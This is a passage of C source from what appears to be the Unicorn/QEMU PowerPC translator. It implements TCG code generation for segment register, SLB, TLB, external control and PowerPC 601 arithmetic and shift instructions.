gen_addr_reg_index(ctx, t0); gen_helper_icbiep(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* Optional: */ /* dcba */ static void gen_dcba(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a store by the MMU * but does not generate any exception */ } /*** Segment register manipulation ***/ /* Supervisor only: */ /* mfsr */ static void gen_mfsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode)); gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* mfsrin */ static void gen_mfsrin(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4); gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* mtsr */ static void gen_mtsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode)); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* mtsrin */ static void gen_mtsrin(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rD(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } #if defined(TARGET_PPC64) /* Specific implementation for PowerPC 64 "bridge" emulation using SLB */ /* mfsr */ static void gen_mfsr_64b(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode)); gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* mfsrin */ static void gen_mfsrin_64b(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4); gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* mtsr */ static void gen_mtsr_64b(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode)); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* mtsrin */ static void gen_mtsrin_64b(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* slbmte */ static void gen_slbmte(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_store_slb(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } static void gen_slbmfee(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_slb_esid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_slbmfev(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_slb_vsid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_slbfee_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1, *l2; if (unlikely(ctx->pr)) { gen_inval_exception(ctx, POWERPC_EXCP_PRIV_REG); return; } gen_helper_find_slb_vsid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rS(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], CRF_EQ); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rS(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); } #endif /* defined(TARGET_PPC64) */ /*** Lookaside buffer management ***/ /* Optional & supervisor only: */ /* tlbia */ static void gen_tlbia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; gen_helper_tlbia(tcg_ctx, tcg_ctx->cpu_env); } /* tlbiel */ static void gen_tlbiel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbie */ static void gen_tlbie(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1; if (ctx->gtse) { CHK_SV; /* If gtse is set then tlbie is supervisor privileged */ } else { CHK_HV; /* Else hypervisor privileged */ } if (NARROW_MODE(ctx)) { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } else { gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_gen_ori_i32(tcg_ctx, t1, t1, TLB_NEED_GLOBAL_FLUSH); tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_temp_free_i32(tcg_ctx, t1); } /* tlbsync */ static void gen_tlbsync(DisasContext *ctx) { if (ctx->gtse) { CHK_SV; /* If gtse is set then tlbsync is supervisor privileged */ } else { CHK_HV; /* Else hypervisor privileged */ } /* BookS does both ptesync and tlbsync make tlbsync a nop for server */ if (ctx->insns_flags & PPC_BOOKE) { gen_check_tlb_flush(ctx, true); } } #if defined(TARGET_PPC64) /* slbia */ static void gen_slbia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t ih = (ctx->opcode >> 21) & 0x7; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ih); CHK_SV; gen_helper_slbia(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } /* slbie */ static void gen_slbie(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_slbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* slbieg */ static void gen_slbieg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_slbieg(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* slbsync */ static void gen_slbsync(DisasContext *ctx) { CHK_SV; gen_check_tlb_flush(ctx, true); } #endif /* defined(TARGET_PPC64) */ /*** External control ***/ /* Optional: */ /* eciwx */ static void gen_eciwx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* Should check EAR[E] ! */ gen_set_access_type(ctx, ACCESS_EXT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, ctx->mem_idx, DEF_MEMOP(MO_UL | MO_ALIGN)); tcg_temp_free(tcg_ctx, t0); } /* ecowx */ static void gen_ecowx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* Should check EAR[E] ! */ gen_set_access_type(ctx, ACCESS_EXT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_st_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, ctx->mem_idx, DEF_MEMOP(MO_UL | MO_ALIGN)); tcg_temp_free(tcg_ctx, t0); } /* PowerPC 601 specific instructions */ /* abs - abs. */ static void gen_abs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* abso - abso. */ static void gen_abso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_ov, a, 0x80000000); tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* clcs */ static void gen_clcs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rA(ctx->opcode)); gen_helper_clcs(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); /* Rc=1 sets CR0 to an undefined state */ } /* div - div. */ static void gen_div(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_div(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divo - divo. */ static void gen_divo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divo(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divs - divs. */ static void gen_divs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divs(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divso - divso. */ static void gen_divso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divso(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* doz - doz. */ static void gen_doz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], l1); tcg_gen_sub_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* dozo - dozo. */ static void gen_dozo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], l1); tcg_gen_sub_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xor_tl(tcg_ctx, t2, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l2); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* dozi */ static void gen_dozi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_LT, cpu_gpr[rA(ctx->opcode)], simm, l1); tcg_gen_subfi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm, cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* lscbx - lscbx. */ static void gen_lscbx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode)); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, rA(ctx->opcode)); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_addr_reg_index(ctx, t0); gen_helper_lscbx(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); tcg_gen_andi_tl(tcg_ctx, cpu_xer, cpu_xer, ~0x7F); tcg_gen_or_tl(tcg_ctx, cpu_xer, cpu_xer, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t0); } tcg_temp_free(tcg_ctx, t0); } /* maskg - maskg. */ static void gen_maskg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t3, 0xFFFFFFFF); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 0x1F); tcg_gen_addi_tl(tcg_ctx, t2, t0, 1); tcg_gen_shr_tl(tcg_ctx, t2, t3, t2); tcg_gen_shr_tl(tcg_ctx, t3, t3, t1); tcg_gen_xor_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t2, t3); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); tcg_gen_neg_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* maskir - maskir. */ static void gen_maskir(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_and_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_andc_tl(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* mul - mul. */ static void gen_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_trunc_i64_tl(tcg_ctx, t2, t0); gen_store_spr(tcg_ctx, SPR_MQ, t2); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulo - mulo. */ static void gen_mulo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_trunc_i64_tl(tcg_ctx, t2, t0); gen_store_spr(tcg_ctx, SPR_MQ, t2); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_gen_ext32s_i64(tcg_ctx, t1, t0); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_EQ, t0, t1, l1); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); gen_set_label(tcg_ctx, l1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* nabs - nabs. */ static void gen_nabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_neg_tl(tcg_ctx, d, d); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* nabso - nabso. */ static void gen_nabso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_neg_tl(tcg_ctx, d, d); /* nabs never overflows */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* rlmi - rlmi. */ static void gen_rlmi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_rotl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, MASK(mb, me)); tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], ~MASK(mb, me)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* rrib - rrib. */ static void gen_rrib(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0x80000000); tcg_gen_shr_tl(tcg_ctx, t1, t1, t0); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); tcg_gen_andc_tl(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sle - sle. */ static void gen_sle(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shr_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sleq - sleq. */ static void gen_sleq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t2, 0xFFFFFFFF); tcg_gen_shl_tl(tcg_ctx, t2, t2, t0); tcg_gen_rotl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sliq - sliq. */ static void gen_sliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* slliq - slliq. */ static void gen_slliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotli_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, (0xFFFFFFFFU << sh)); tcg_gen_andi_tl(tcg_ctx, t1, t1, ~(0xFFFFFFFFU << sh)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sllq - sllq. */ static void gen_sllq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shl_tl(tcg_ctx, t1, t1, t2); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); gen_load_spr(tcg_ctx, t0, SPR_MQ); tcg_gen_and_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); gen_load_spr(tcg_ctx, t2, SPR_MQ); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, 